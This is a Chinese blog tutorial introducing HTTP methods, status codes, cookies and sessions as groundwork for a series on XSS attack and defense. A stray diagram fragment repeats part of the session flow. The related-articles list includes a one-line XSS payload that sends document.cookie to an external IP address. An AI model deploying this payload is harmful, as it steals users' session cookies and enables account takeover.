XSS渗透与防御——(一)HTTP协议

已于 2022-03-08 22:30:04 修改
阅读量718 收藏 2
点赞数
分类专栏: # XSS 文章标签: http xss https
于 2022-03-08 22:26:34 首次发布
本文博主FisrtBqy。文章内容仅供学习交流,未经允许请勿用于论文写作、竞赛答辩、书刊出版、商业活动等。如有问题请联系作者:[email protected]
本文链接:https://blog.csdn.net/FisrtBqy/article/details/123364895
版权

第一章 HTTP协议

1 HTTP请求响应

1.1 常见的请求方式

归类方法作用
常用GET请求从服务器获取资源
HEAD类似于GET请求,只不过不会返回实体数据,只获取报头
POST向服务器提交数据
PUT替换服务器的内容
不常用DELETE请求服务器删除指定的资源
TRACE对链路进行测试或诊断
OPTIONS列出可对资源实行的操作方法,Allow字段里返回
CONNECT要求服务器和另一台服务器建立连接,充当代理
扩展MKCOL、COPY、MOVE、LOCK、UNLOCK、PATCH

1.2 HTTP请求格式

HTTP请求格式

1.3 HTTP响应格式

HTTP响应格式
在这里插入图片描述

状态码 200 OK 表明请求已经成功. 默认情况下状态码为200的响应可以被缓存。

不同请求方式对于请求成功的意义如下:

  • GET: 已经取得资源,并将资源添加到响应的消息体中。
  • HEAD: 响应的消息体为头部信息。
  • POST: 响应的消息体中包含此次请求的结果。
  • TRACE: 响应的消息体中包含服务器接收到的请求信息。

PUTDELETE 的请求成功通常并不是响应200 OK的状态码而是 204 No Content 表示无内容(或者 201 Created表示一个资源首次被创建成功)。

1.4 HTTP特点

  • 请求应答模式

    在HTTP1.1版本以前,客户端向服务端发送请求后,服务端才会向客户端发送数据

  • 灵活可拓展

    响应头中Content-Type描述数据类型,不限制

  • 可靠传输

    工作在应用层,三次握手,四次挥手

  • 无状态stateless

    客户端的每次请求相互独立

2 Cookie和Session

2.1 客户端的cookie

2.1.1 cookie

在这里插入图片描述

  • Cookie特点

    明文、可修改、大小受限(视浏览器而定)、不能跨浏览器或跨域名

在这里插入图片描述

2.1.2 JavaScript操作cookie

在这里插入图片描述

2.1.3 浏览器插件操作cookie

在这里插入图片描述在这里插入图片描述

2.2 服务端的Session

  • session创建、校验、销毁
客户端 服务端 第一次访问(开启对话,将登录信息保存到session) Cookie发送给客户端(如果勾选记住密码,写入cookie) 发送Cookie字段(从session中取出信息,判断登录状态) 后续操作,保持登录 注销(销毁session,cookie过期) 客户端 服务端
  • 判断用户是否已登录的逻辑

,写入cookie)
k->>f:发送Cookie字段(从session中取出信息,判断登录状态)
k->>f:后续操作,保持登录
k->>f:注销(销毁session,cookie过期)


- 判断用户是否已登录的逻辑

  检查发来的cookie中的用户名id等信息在服务端是否有存储
FisrtBqy
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web安全之XSS攻击与防御小结
02-23
(1)反射型:发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS随响应内容一起返回给浏览器,最后浏览器解析执行XSS代码,这个过程就像一次发射,所以叫反射型XSS。(2)存储型:...
【前端安全】JavaScript防http劫持与XSS
weixin_34127717的博客
08-16 336
作为前端,一直以来都知道HTTP劫持与XSS跨站脚本(Cross-site scripting)、CSRF跨站请求伪造(Cross-site request forgery)。但是一直都没有深入研究过,前些日子同事的分享会偶然提及,我也对这一块很感兴趣,便深入研究了一番。 最近用 JavaScript 写了一个组件,可以在前端层面防御部分 HTTP 劫持与 XSS。 当然,防御这些劫持最好的方...
XSS HTTP-only
luojinbai的专栏
02-28 994
装载自: http://itlab.idcquan.com/security/wlaq/777263.html在Web安全领域,跨站脚本攻击时最为常见的一种攻击形式,也是长久以来的一个老大难问题,而本文将向读者介绍的是一种用以缓解这种压力的技术,即HTTP-only cookie.我们首先对HTTP-only cookie和跨站脚本攻击做了简单的解释,然后详细说明了如何利用HTTP-only coo
XSS(一)基础知识
shirlly_的博客
04-12 223
http基础知识
Http协议&表单防止重复提交&XSS攻击&跨域五种实战解决方案
weixin_35381618的博客
04-21 1178
http长连接与短连接 HTTP协议与TCP/IP协议的关系 HTTP的长连接和短连接本质上是TCP长连接和短连接。HTTP属于应用层协议,在传输层使用TCP协议,在网络层使用IP协议。IP协议主要解决网络路由和寻址问题,TCP协议主要解决如何在IP层之上可靠的传递数据包,使在网络上的另一端收到发端发出的所有包,并且顺序与发出顺序一致。TCP有可靠,面向连接的特点。 如何...
httpxss和csrf 攻击
u010900754的专栏
12-15 431
xss攻击: xss,也叫作css,cross-site-script,跨站脚本攻击,原理大致是将一段恶意的js代码注入到目标网站,用户浏览被注入的网站时就会被攻击。 常规来讲,有以下三种途径: 1.反射型 将恶意的js代码作为参数或者表单信息,提交给服务端,服务端没有对输入做校验或者处理,而是直接将参数嵌入到返回页面中,返回给用户,这样恶意的js代码就会在返回页面中被执行。 2.dom...
xss发送请求
3569
11-06 670
var img=document.createElement("img"); img.src="http://172.16.5.110:64321/?cao="+escape(document.cookie); document.body.appendChild(img);
XSS跨站脚本攻击剖析与防御
04-28
XSS跨站脚本攻击剖析与防御是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做了...
XSS测试代码大全————
11-03
XSS测试代码 安全测试 XSS测试代码大全
XSSHTTP-only
Simael的专栏
10-18 1030
原文地址:httponly作者:buptwangzhe 摘自:http://netsecurity.51cto.com/art/200902/111143.htm 一、XSSHTTP-only Cookie简介 跨站点脚本攻击是困扰Web服务器安全的常见问题之一。跨站点脚本攻击是一种服务器端的安全漏洞,常见于当把用户的输入作为HTML提交时,服务器 端没有进行适当的过滤所致。跨站点脚本攻击可能
HTTP系列 干饭人冲啊----XSS攻击?什么是xss攻击
Genus_的博客
01-13 432
什么是XSS攻击 XSS(Cross Site Scripting)攻击是指浏览器中执行恶意脚本(无论是跨域还是同域),从而拿到用户的信息并操作 这些操作一般可以完成下面这些事情: 窃取cookie 监听用户的行为,比如输入账号密码等 修改DOM伪造登录表单 在页面中生成浮窗广告 xss攻击指的是跨站脚本攻击,是一种代码注入攻击,攻击者通过在网站注入恶意脚本,使之在用户的浏览器上运行,从而盗取用户的信息,如cookie等, xss的本质是因为网站没有对恶意脚本进行过滤,与正常代码混合在一起
http 协议详解
hl1293348082的专栏
03-25 637
HTTP 协议,即超文本传输协议 (Hypertext transfer protocol)。 是一种详细规定了浏览器和万维网 (WWW = World Wide Web) 服务器之间互相通信的规则,通过因特网传送万维网文档的数据传送协议 HTTP协议的特点就不好再赘述了 中文RFC文档:[超文本传输协议--HTTP1.0] http://man.chinaunix.net/develop/rfc/RFC1945.txt HTTP请求方法 一个 HTTP 请求结构 HTTP1
java http url xss,XSS简介
weixin_35803802的博客
03-13 557
XSS跨站脚本攻击(Cross Site Scripting),是将Java script代码插入web页面中,之后当用户浏览页面时, 会执行嵌套在web页面里面的Java script代码,从而达到攻击用户的目的。为了跟HTML里面的层叠样式表(CSS ,Cascading Style Sheets)作区分,所以叫作XSS.反射型XSS的入侵过程:攻击者将含有恶意JavaScript代码的URL...
Http常见问题
qq_51240148的博客
05-14 255
.
Python爬虫——如何使用urllib的HTTP基本库
C1356498720的博客
05-14 777
robots.txt。
httphttps的区别
Mr.xing的博客
05-13 260
其实也不一定就安全,原因是用户不会再访问时候加上http:// 或 https://, 浏览器就默认会加上http://,然后通过转发的方式转成https:// 这个过程http就有可能会被劫持了。而HTTPS则通过SSL/TLS协议进行加密传输,这种加密方式可以保护数据在传输过程中的安全,防止数据被窃取或篡改。这可能导致HTTPS在某些情况下比HTTP稍慢一些,但考虑到其提供的安全性,这种资源消耗是可以接受的。2. 连接方式:HTTP的连接是明文的,而HTTPS则通过SSL/TLS协议建立加密连接。
Golang:使用net/http实现一个简易的http服务器
最新发布
彭世瑜的博客
05-18 247
可以看到,我们的服务端可以正确获取到请求的参数信息和json请求体,以及请求头部信息。注意:由于请求体只能读取一次,所以form和rawData只能取到一个。1、实现一个简易的服务端。的服务,返回请求的信息。
HTTP 发展史
山重水复疑无路,柳暗花明又一村。
05-14 794
超文本传输协议(英语:HyperTextTransferProtocol,缩写:HTTP是万维网(World Wide Web)的基础协议。自蒂姆·伯纳斯-李(Tim BernersLee)博士和他的团队在 1989-1991 年间创造出它以来,HTTP 已经发生了太多的变化,在保持协议简单性的同时,不断扩展其灵活性。如今,HTTP 已经从一个只在实验室之间交换文档的早期协议进化到了可以传输图片,高分辨率视频和 3D 效果的现代复杂互联网协议。HTTP的诞生1989 年 3 月。
HTTPHTTPS 的区别 + SSL协议
Iamme
05-17 938
服务端用私钥解密后,得到了客户端传过来的随机值(对称秘钥),然后把内容通过该值进行对称加密,所谓对称加密就是,将信息和私钥通过某种算法混合在一起,这样除非知道私钥,不然无法获取内容,而正好客户端和服务端都知道这个私钥,所以只要加密算法够彪悍,私钥够复杂,数据就够安全。这种方法看起来不错,但是也存在问题,如果在发送的时候被拦截下来,密钥就会泄露给中间人,此时中间人就可以通过密钥来对之后的数据进行解密,此时也就失去了加密的意义这时,就引入了非对称加密。SSL确保安全性的同时,在客户端和服务端都要进行。
xss漏洞的危害与防御
05-30
XSS(Cross-site scripting)漏洞是一种常见的Web安全漏洞,攻击者通过在Web页面中注入恶意脚本,从而实现对用户信息的窃取、篡改或者伪造等恶意行为。XSS漏洞的危害性非常大,攻击者可以利用漏洞获取用户的敏感信息、盗取用户的账号密码、发起钓鱼攻击等,对用户的隐私和财产造成威胁。 防御XSS漏洞的方法主要有以下几个方面: 1. 输入验证:对用户输入的数据进行过滤和校验,防止恶意脚本的注入。 2. 输出编码:对输出到Web页面的数据进行编码,防止恶意脚本的执行。 3. HttpOnly标记:在设置Cookie时,添加HttpOnly标记,防止恶意脚本通过document.cookie获取Cookie信息。 4. CSP(Content Security Policy):限制Web页面中可加载的资源,防止XSS攻击。 5. 使用框架和库:使用流行的Web框架和库,可以减少XSS攻击的风险,因为这些框架和库已经实现了一些XSS防御机制。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值